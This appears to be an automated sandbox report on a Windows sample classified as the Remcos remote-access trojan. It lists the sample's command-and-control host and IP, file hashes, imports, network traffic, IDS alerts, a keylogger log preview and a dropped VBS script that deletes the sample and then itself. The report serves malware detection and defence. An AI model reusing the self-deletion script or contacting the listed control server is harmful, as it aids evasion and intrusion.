                        http://geoplugin.net/json.gp-xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        85.60.29.68
                        		sendfiletiahforem.duckdns.orgSpain
                        		12479UNI2-ASEStrue
                        178.237.33.50
                        		geoplugin.netNetherlands
                        		8455ATOM86-ASATOM86NLfalse

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1435635
                        Start date and time:2024-05-03 00:35:06 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 4m 57s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:20
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:xi0TpAxHGMsm.exe
                        Detection:MAL
                        Classification:mal100.rans.troj.spyw.expl.evad.winEXE@3/3@2/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 51
                        • Number of non-executed functions: 213
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: xi0TpAxHGMsm.exe

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        85.60.29.68x6iIksiqNqad.exeGet hashmaliciousRemcosBrowse
                          xOg18pHQGOQK.exeGet hashmaliciousNjratBrowse
                            xOg18pHQGOQK.exeGet hashmaliciousNjratBrowse
                              178.237.33.50PO-USC-22USC-KonchoCo.exeGet hashmaliciousGuLoader, RemcosBrowse
                              • geoplugin.net/json.gp
                              REVISED NEW ORDER 7936-2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                              • geoplugin.net/json.gp
                              INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                              • geoplugin.net/json.gp
                              GVV.exeGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exeGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                              • geoplugin.net/json.gp
                              202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                              • geoplugin.net/json.gp
                              nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              sendfiletiahforem.duckdns.orgx6iIksiqNqad.exeGet hashmaliciousRemcosBrowse
                              • 85.60.29.68
                              xOg18pHQGOQK.exeGet hashmaliciousNjratBrowse
                              • 85.60.29.68
                              xOg18pHQGOQK.exeGet hashmaliciousNjratBrowse
                              • 85.60.29.68
                              geoplugin.netPO-USC-22USC-KonchoCo.exeGet hashmaliciousGuLoader, RemcosBrowse
                              • 178.237.33.50
                              REVISED NEW ORDER 7936-2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                              • 178.237.33.50
                              INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                              • 178.237.33.50
                              GVV.exeGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exeGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                              • 178.237.33.50
                              202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                              • 178.237.33.50
                              nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                              • 178.237.33.50

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              UNI2-ASESp67UidesWn.elfGet hashmaliciousMiraiBrowse
                              • 188.78.234.101
                              Gb5Zd5Ird3.elfGet hashmaliciousMiraiBrowse
                              • 90.161.219.127
                              L31owFeEHg.elfGet hashmaliciousMiraiBrowse
                              • 37.11.67.166
                              cvoBQP1Lxo.elfGet hashmaliciousMiraiBrowse
                              • 95.19.23.99
                              x6iIksiqNqad.exeGet hashmaliciousRemcosBrowse
                              • 85.60.29.68
                              sora.arm.elfGet hashmaliciousMiraiBrowse
                              • 95.20.238.255
                              xOg18pHQGOQK.exeGet hashmaliciousNjratBrowse
                              • 85.60.29.68
                              xOg18pHQGOQK.exeGet hashmaliciousNjratBrowse
                              • 85.60.29.68
                              gVPlpwuoVV.elfGet hashmaliciousMiraiBrowse
                              • 90.172.70.110
                              TsDTSDr8mU.elfGet hashmaliciousMiraiBrowse
                              • 95.20.61.34
                              ATOM86-ASATOM86NLPO-USC-22USC-KonchoCo.exeGet hashmaliciousGuLoader, RemcosBrowse
                              • 178.237.33.50
                              REVISED NEW ORDER 7936-2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                              • 178.237.33.50
                              INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                              • 178.237.33.50
                              GVV.exeGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exeGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                              • 178.237.33.50
                              202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                              • 178.237.33.50
                              https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:c2e8c3b1-63be-4a97-a3b9-a21649a6fcffGet hashmaliciousRemcosBrowse
                              • 178.237.33.50

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\ProgramData\Disk\Disk.dat

                              Download File
                              Process:C:\Users\user\Desktop\xi0TpAxHGMsm.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):144
                              Entropy (8bit):3.340563546555108
                              Encrypted:false
                              SSDEEP:3:rhlKlFelZlNQlbU5JWRal2Jl+7R0DAlBG45klovDl6v:6lsZ4ZU5YcIeeDAlOWAv
                              MD5:C9D9BC2305C360931D2409FF33919CFC
                              SHA1:B169F5C632260B0B94DC3212BDE72849271FAB37
                              SHA-256:7D5B18EE696110C03673566909BE986D060B3D6496D55B811A53D9D3B9FFE6FB
                              SHA-512:5BEC65D04AA580F02E89CD44D414199C6C475ED477F381FD0813D09E02D71E46820F6E71F3065092DAFE79D86D795C000866B640E50C9E6E139B3744E96FA9EF
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\Disk\Disk.dat, Author: Joe Security
                              Reputation:low
                              Preview:....[.2.0.2.4./.0.5./.0.3. .0.0.:.3.5.:.5.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json

                              Download File
                              Process:C:\Users\user\Desktop\xi0TpAxHGMsm.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):965
                              Entropy (8bit):5.023626250399301
                              Encrypted:false
                              SSDEEP:12:tkeknd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw7x:qPdRNuKyGX85jvXhNlT3/7AcV9Wro
                              MD5:1D705D315B7FECE2D6C13A47EFD128A7
                              SHA1:32114D761B27C27C3686DC835AAD5E05B6B5A6F3
                              SHA-256:52729AABEA95E5F9A1C211F9C952B6827328D2AA816B8138048F1691DD638023
                              SHA-512:28CDA3717CD460797BD65CD6FD9CF79C683DB45DA67D0C1C27C3CDEAFFCEA6541CA36F63BD10C66BC36DA74B1399B9B4AA0A4F0F205C4E1A630BD6886E501148
                              Malicious:false
                              Reputation:low
                              Preview:{. "geoplugin_request":"191.96.227.219",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                              C:\Users\user\AppData\Local\Temp\yghndvikdwwpc.vbs

                              Download File
                              Process:C:\Users\user\Desktop\xi0TpAxHGMsm.exe
                              File Type:data
                              Category:modified
                              Size (bytes):492
                              Entropy (8bit):3.5058350384510923
                              Encrypted:false
                              SSDEEP:12:xQ4lA2++ugypjBQMPURXkXIM64Q3DMkXIM649Hz/0aimi:7a2+SDxgnQTMgn9Aait
                              MD5:14C94E5B500B3AD817095A0C220DE8D6
                              SHA1:D62BDA6BF60D5A2B65F759835FD1C9E31540E066
                              SHA-256:CD8F1A1F0FBF23F58BF9F804961628F030ED4439AAB69189EB8D913EB9A4B43F
                              SHA-512:616D63849D93B6F27D25C21CF6AA2A3E1C390EED5E12B53F334FD9F723B09CF93E4ACC3B38B3993E6FCFCAA4294682BE8BCB315DB0D2EC2707C6D91D0ED5A243
                              Malicious:false
                              Reputation:low
                              Preview:O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...w.h.i.l.e. .f.s.o...F.i.l.e.E.x.i.s.t.s.(.".C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.D.e.s.k.t.o.p.\.x.i.0.T.p.A.x.H.G.M.s.m...e.x.e.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.D.e.s.k.t.o.p.\.x.i.0.T.p.A.x.H.G.M.s.m...e.x.e."...w.e.n.d...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.597245068665957
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:xi0TpAxHGMsm.exe
                              File size:494'080 bytes
                              MD5:effe954da69f8377295e43c84e48bd77
                              SHA1:2cce76b35acab30714dcb56042808efbf05ae969
                              SHA256:950b538fcf4aa8021867bce803c551b098b1481fc9b468772efb81f51c4c1c8c
                              SHA512:280f3aba77d9815f4b2e81462a97751f399c4d73a07a5fb3812bb6594826a81fe5ac449cf53409f8d51b16a6e61b99162923a28c54a02171ce016935823448cc
                              SSDEEP:6144:+XIktXfM8Lv86r9uVWAa2je4Z5zl4hgDHQQs4NTQjoHFsAOZZsAX4cNe5Gv:+X7tPMK8ctGe4Dzl4h2QnuPs/Zsvcv
                              TLSH:68B49E01BAD1C072D57514300D3AF776EAB8BD2028364A7B73D61D5BFE31190B62AAB7
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..- ..~ ..~ ..~.f$~3..~.f&~...~.f'~>..~).Q~!..~.Z.~"..~....:..~.......~.......~).F~9..~ ..~...~....D..~..*~!..~....!..~Rich ..

                              File Icon

                              Icon Hash:95694d05214c1b33

                              Static PE Info

                              General

                              Entrypoint:0x4349ef
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:TERMINAL_SERVER_AWARE
                              Time Stamp:0x65631255 [Sun Nov 26 09:39:33 2023 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:8d5087ff5de35c3fbb9f212b47d63cad

                              Entrypoint Preview

                              Instruction
                              call 00007F1D94E95DFCh
                              jmp 00007F1D94E95813h
                              push ebp
                              mov ebp, esp
                              sub esp, 00000324h
                              push ebx
                              push esi
                              push 00000017h
                              call 00007F1D94EB8074h
                              test eax, eax
                              je 00007F1D94E95987h
                              mov ecx, dword ptr [ebp+08h]
                              int 29h
                              xor esi, esi
                              lea eax, dword ptr [ebp-00000324h]
                              push 000002CCh
                              push esi
                              push eax
                              mov dword ptr [00471D14h], esi
                              call 00007F1D94E97DE7h
                              add esp, 0Ch
                              mov dword ptr [ebp-00000274h], eax
                              mov dword ptr [ebp-00000278h], ecx
                              mov dword ptr [ebp-0000027Ch], edx
                              mov dword ptr [ebp-00000280h], ebx
                              mov dword ptr [ebp-00000284h], esi
                              mov dword ptr [ebp-00000288h], edi
                              mov word ptr [ebp-0000025Ch], ss
                              mov word ptr [ebp-00000268h], cs
                              mov word ptr [ebp-0000028Ch], ds
                              mov word ptr [ebp-00000290h], es
                              mov word ptr [ebp-00000294h], fs
                              mov word ptr [ebp-00000298h], gs
                              pushfd
                              pop dword ptr [ebp-00000264h]
                              mov eax, dword ptr [ebp+04h]
                              mov dword ptr [ebp-0000026Ch], eax
                              lea eax, dword ptr [ebp+04h]
                              mov dword ptr [ebp-00000260h], eax
                              mov dword ptr [ebp-00000324h], 00010001h
                              mov eax, dword ptr [eax-04h]
                              push 00000050h
                              mov dword ptr [ebp-00000270h], eax
                              lea eax, dword ptr [ebp-58h]
                              push esi
                              push eax
                              call 00007F1D94E97D5Eh

                              Rich Headers

                              Programming Language:
                              • [C++] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x6eea80x104.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x790000x494c.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x7e0000x3bcc.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x6d3400x38.rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x6d3d40x18.rdata
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x6d3780x40.rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x590000x4fc.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x571750x57200f959ed65f49a903603bc150bbb7292aaFalse0.571329694225251data6.62552167894442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x590000x179b60x17a00da5a02830f9692f0e185ce6da657bd28False0.5005683697089947Zebra Metafile graphic (comment = \210\002\007)5.859352576268188IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0x710000x5d440xe00fa1a169b9414830def88848af87110b5False0.22154017857142858data3.00580031855032IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .tls0x770000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .gfids0x780000x2300x40009e4699aa75951ab53e804fe4f9a3b6bFalse0.3271484375data2.349075166240886IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .rsrc0x790000x494c0x4a0007bcd974cd7d61767d21a39c72d97d46False0.2627217060810811data3.8348703072208528IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x7e0000x3bcc0x3c000a6e61b09628beca43d4bf9604f65238False0.7639973958333334data6.718533933603825IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_ICON0x7918c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3421985815602837
                              RT_ICON0x795f40x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.27704918032786885
                              RT_ICON0x79f7c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.23686679174484052
                              RT_ICON0x7b0240x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.22977178423236513
                              RT_RCDATA0x7d5cc0x33dOpenPGP Public Key1.0132689987937273
                              RT_GROUP_ICON0x7d90c0x3edataEnglishUnited States0.8064516129032258

                              Imports

                              DLLImport
                              KERNEL32.dllFindNextFileA, ExpandEnvironmentStringsA, GetLongPathNameW, CopyFileW, GetLocaleInfoA, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, GetNativeSystemInfo, HeapAlloc, GetProcessHeap, FreeLibrary, IsBadReadPtr, GetTempPathW, OpenProcess, OpenMutexA, lstrcatW, GetCurrentProcessId, GetTempFileNameW, UnmapViewOfFile, DuplicateHandle, CreateFileMappingW, MapViewOfFile, GetSystemDirectoryA, GlobalAlloc, GlobalLock, GetTickCount, GlobalUnlock, WriteProcessMemory, ResumeThread, GetThreadContext, ReadProcessMemory, CreateProcessW, SetThreadContext, LocalAlloc, GlobalFree, MulDiv, SizeofResource, QueryDosDeviceW, FindFirstVolumeW, GetConsoleScreenBufferInfo, SetConsoleTextAttribute, lstrlenW, GetStdHandle, SetFilePointer, FindResourceA, LockResource, LoadResource, LocalFree, FindVolumeClose, GetVolumePathNamesForVolumeNameW, lstrcpyW, FindFirstFileA, FormatMessageA, FindNextVolumeW, AllocConsole, lstrcmpW, GetModuleFileNameA, lstrcpynA, QueryPerformanceFrequency, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, HeapSize, WriteConsoleW, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindFirstFileExA, ReadConsoleW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, GetTimeZoneInformation, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, HeapReAlloc, GetACP, GetModuleHandleExW, MoveFileExW, RtlUnwind, RaiseException, LoadLibraryExW, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, CompareStringW, TlsFree, TlsSetValue, TlsGetValue, GetFileSize, TerminateThread, GetLastError, CreateDirectoryW, GetModuleHandleA, RemoveDirectoryW, MoveFileW, SetFilePointerEx, GetLogicalDriveStringsA, DeleteFileW, DeleteFileA, SetFileAttributesW, GetFileAttributesW, FindClose, lstrlenA, GetDriveTypeA, FindNextFileW, GetFileSizeEx, FindFirstFileW, GetModuleHandleW, ExitProcess, CreateMutexA, GetCurrentProcess, GetProcAddress, LoadLibraryA, CreateProcessA, PeekNamedPipe, CreatePipe, TerminateProcess, ReadFile, HeapFree, HeapCreate, CreateEventA, GetLocalTime, CreateThread, SetEvent, CreateEventW, WaitForSingleObject, Sleep, GetModuleFileNameW, CloseHandle, ExitThread, CreateFileW, WriteFile, SetConsoleOutputCP, TlsAlloc, InitializeCriticalSectionAndSpinCount, MultiByteToWideChar, DecodePointer, EncodePointer, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, WaitForSingleObjectEx, ResetEvent, SetEndOfFile
                              USER32.dllGetWindowTextW, wsprintfW, GetClipboardData, UnhookWindowsHookEx, GetForegroundWindow, ToUnicodeEx, GetKeyboardLayout, SetWindowsHookExA, CloseClipboard, OpenClipboard, GetKeyboardState, CallNextHookEx, GetKeyboardLayoutNameA, GetKeyState, GetWindowTextLengthW, GetWindowThreadProcessId, GetMessageA, SetClipboardData, EnumWindows, ExitWindowsEx, EmptyClipboard, ShowWindow, SetWindowTextW, MessageBoxW, IsWindowVisible, CloseWindow, SendInput, EnumDisplaySettingsW, mouse_event, CreatePopupMenu, DispatchMessageA, TranslateMessage, TrackPopupMenu, DefWindowProcA, CreateWindowExA, GetIconInfo, GetSystemMetrics, AppendMenuA, RegisterClassExA, GetCursorPos, SetForegroundWindow, DrawIcon, SystemParametersInfoW
                              GDI32.dllBitBlt, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, StretchBlt, GetDIBits, DeleteObject, CreateDCA, GetObjectA, DeleteDC
                              ADVAPI32.dllCryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameW, RegEnumKeyExA, QueryServiceStatus, CloseServiceHandle, OpenSCManagerW, OpenSCManagerA, ControlService, StartServiceW, QueryServiceConfigW, ChangeServiceConfigW, OpenServiceW, EnumServicesStatusW, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegCreateKeyA, RegCloseKey, RegQueryInfoKeyW, RegQueryValueExA, RegCreateKeyExW, RegEnumKeyExW, RegSetValueExW, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegCreateKeyW, RegDeleteValueW, RegEnumValueW, RegQueryValueExW, RegDeleteKeyA
                              SHELL32.dllShellExecuteExA, Shell_NotifyIconA, ExtractIconA, ShellExecuteW
                              ole32.dllCoInitializeEx, CoUninitialize, CoGetObject
                              SHLWAPI.dllPathFileExistsW, PathFileExistsA, StrToIntA
                              WINMM.dllwaveInUnprepareHeader, waveInOpen, waveInStart, waveInAddBuffer, PlaySoundW, mciSendStringA, mciSendStringW, waveInClose, waveInStop, waveInPrepareHeader
                              WS2_32.dllgethostbyname, send, WSAStartup, closesocket, inet_ntoa, htons, htonl, getservbyname, ntohs, getservbyport, gethostbyaddr, inet_addr, WSASetLastError, WSAGetLastError, recv, connect, socket
                              urlmon.dllURLOpenBlockingStreamW, URLDownloadToFileW
                              gdiplus.dllGdipSaveImageToStream, GdipGetImageEncodersSize, GdipFree, GdipDisposeImage, GdipAlloc, GdipCloneImage, GdipGetImageEncoders, GdiplusStartup, GdipLoadImageFromStream
                              WININET.dllInternetOpenUrlW, InternetOpenW, InternetCloseHandle, InternetReadFile

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States

                              Network Behavior

                              Snort IDS Alerts

                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                              05/03/24-00:35:56.320861TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response88894970085.60.29.68192.168.2.7
                              05/03/24-00:35:56.084786TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin497008889192.168.2.785.60.29.68

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              May 3, 2024 00:35:55.896814108 CEST497008889192.168.2.785.60.29.68
                              May 3, 2024 00:35:56.083476067 CEST88894970085.60.29.68192.168.2.7
                              May 3, 2024 00:35:56.083558083 CEST497008889192.168.2.785.60.29.68
                              May 3, 2024 00:35:56.084785938 CEST497008889192.168.2.785.60.29.68
                              May 3, 2024 00:35:56.320861101 CEST88894970085.60.29.68192.168.2.7
                              May 3, 2024 00:35:56.322182894 CEST497008889192.168.2.785.60.29.68
                              May 3, 2024 00:35:56.511254072 CEST88894970085.60.29.68192.168.2.7
                              May 3, 2024 00:35:56.568487883 CEST497008889192.168.2.785.60.29.68
                              May 3, 2024 00:35:57.040203094 CEST4970180192.168.2.7178.237.33.50
                              May 3, 2024 00:35:57.204977036 CEST8049701178.237.33.50192.168.2.7
                              May 3, 2024 00:35:57.205075979 CEST4970180192.168.2.7178.237.33.50
                              May 3, 2024 00:35:57.214010000 CEST4970180192.168.2.7178.237.33.50
                              May 3, 2024 00:35:57.381263018 CEST8049701178.237.33.50192.168.2.7
                              May 3, 2024 00:35:57.381365061 CEST4970180192.168.2.7178.237.33.50
                              May 3, 2024 00:35:58.381120920 CEST8049701178.237.33.50192.168.2.7
                              May 3, 2024 00:35:58.381217957 CEST4970180192.168.2.7178.237.33.50
                              May 3, 2024 00:35:58.558502913 CEST4970180192.168.2.7178.237.33.50
                              May 3, 2024 00:35:58.637902975 CEST497008889192.168.2.785.60.29.68
                              May 3, 2024 00:35:58.721952915 CEST8049701178.237.33.50192.168.2.7
                              May 3, 2024 00:35:58.872060061 CEST88894970085.60.29.68192.168.2.7
                              May 3, 2024 00:36:00.205888987 CEST88894970085.60.29.68192.168.2.7
                              May 3, 2024 00:36:00.207392931 CEST497008889192.168.2.785.60.29.68
                              May 3, 2024 00:36:00.437438965 CEST88894970085.60.29.68192.168.2.7
                              May 3, 2024 00:36:03.846792936 CEST88894970085.60.29.68192.168.2.7
                              May 3, 2024 00:36:03.848531008 CEST497028889192.168.2.785.60.29.68
                              May 3, 2024 00:36:03.896688938 CEST497008889192.168.2.785.60.29.68
                              May 3, 2024 00:36:04.036782980 CEST88894970285.60.29.68192.168.2.7
                              May 3, 2024 00:36:04.036937952 CEST497028889192.168.2.785.60.29.68
                              May 3, 2024 00:36:04.041227102 CEST497028889192.168.2.785.60.29.68
                              May 3, 2024 00:36:04.083647966 CEST88894970085.60.29.68192.168.2.7
                              May 3, 2024 00:36:04.094733000 CEST497038889192.168.2.785.60.29.68
